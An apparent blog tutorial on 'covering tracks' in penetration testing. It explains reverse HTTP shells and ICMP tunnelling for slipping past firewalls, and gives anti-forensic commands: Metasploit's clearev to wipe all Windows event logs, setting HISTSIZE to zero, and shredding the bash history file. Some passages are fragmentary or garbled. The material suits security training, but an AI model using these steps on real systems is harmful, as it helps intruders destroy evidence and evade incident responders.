Covering Track for EH on Penetration testing.
Covering track or Clearing track is the final stage of methodology on penetration testing. White hat hackers cover their tracks to maintain their connection in the system and to avoid detection by incident response teams or by forensics teams. I am here explain different types of Covering tracks.Because maximum of Ethical hacker or penetration tester actually not focus on last stage of methodology.Means they cannot make themselves anonymous.
Reverse HTTP Shells:
A shell is a code that executes commands in a device like a server or mobile device e.tc. The intruder installs reverse HTTP shells on the target system and uses it to send communications to the network’s server. The reverse shell is designed in a way that the target device will always return commands. This is possible when port 80(http) is always open, these commands are not flagged by the network’s perimeter security devices like firewalls. Firewalls will read these as benign or trusted HTTP traffic in the network and, will allow communication between the devices. The hacker can now gain any information from the server undetected leaving no footprint behind since all they did was send HTTP commands.
ICMP Tunnels:
The ICMP (Internet control message protocol)is used by a network device to test connectivity,therefore, host is unreachable or alive . Unlike TCP(Transmission control protocol)or UDP(User Datagram protocols), which are used to transfer data, ICMP only transfers echo requests and receive as response on Echo reply. Ethical hackers encapsulate these echo requests with TCP payloads and forward them to the proxy server. This request is then de-capsulated by the proxy server, which extracts the payload and sends it to the hacker. The network’s security devices read this communication as simple ICMP packet transfer hence facilitating the hacker in covering their tracks.
ICMP packet at Network layer
IP header ::: 20 bytes
ICMP header ::: 8 bytes
ICMP payload size::: 1472 bytes (maximum)//payload here represent as DATA)
MTU(Maximum Transmission Unit)(1500)::: 20 + 8 + 1472 = 1500
A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.
Here is two tools information for ICMp tunneling,
Reference: https://www.hackingarticles.in/command-and-control-tunnelling-via-icmp/
Clearing Event Logs:
a. Clearing Log from Metasploit:
In newer versions of Metasploit’s meterpreter, there’s a script called “clearev” to clear all event logs. This program will go into the event logs on a Windows system and clear out ALL of the logs. This might look a little suspicious to the vigilant system admin, but most system admins are NOT vigilant. At the very least, it will remove our connection and/or attempted connection from the log files. Of course, there may be other evidence left behind such as router logs and IDS logs, but we’ll deal with those in a future tutorial.
First, use Metasploit to compromise the system and get a meterpreter command prompt. Once we get a meterpreter on a system,
we can simply type:
• meterpreter > clearev
As we can see in this screenshot above, all of the event logs from Application, System, and Security have been cleared from the log files on the victim system.
b. Clearing Event Logs on Linux Computers:
kwrite is text editor.
c. Erasing the Command History:-
Before we leave the compromised Linux system, we want to make certain that our command history is erased. Remember, the bash shell we’re typing in will save our last 500 commands. A system admin could track all of our commands and detect and decipher our activities on the system and potentially use them as evidence.
- more ~/.bash_history
The size of our history file is determined by the environment variable HISTSIZE. We can check the size of the HISTSIZE variable by typing:
echo $HISTSIZE
export HISTSIZE=0
Now, our shell will not store any of our history! If you remember, change it to zero before beginning the hack and none of your commands will be stored, but if you’ve already written some commands, remember to log out and log back in to clear your history after setting the HISTSIZE to zero.
d. Shredding the History File:-
Sometimes we won’t have enough time to erase the history file or change the HISTSIZE variable. In a hurry, we can simply shred our history file by typing:
- shred -zu root/.bash_history
The shred command with the -zu switches will overwrite the history with zeros and delete the file. To check to see if our history has been shredded, we can view the history file by typing:
. more /root/.bashhistory
Thank you I hope you will find it useful.
Have a great day and stay safe. _/(‘_’)\_
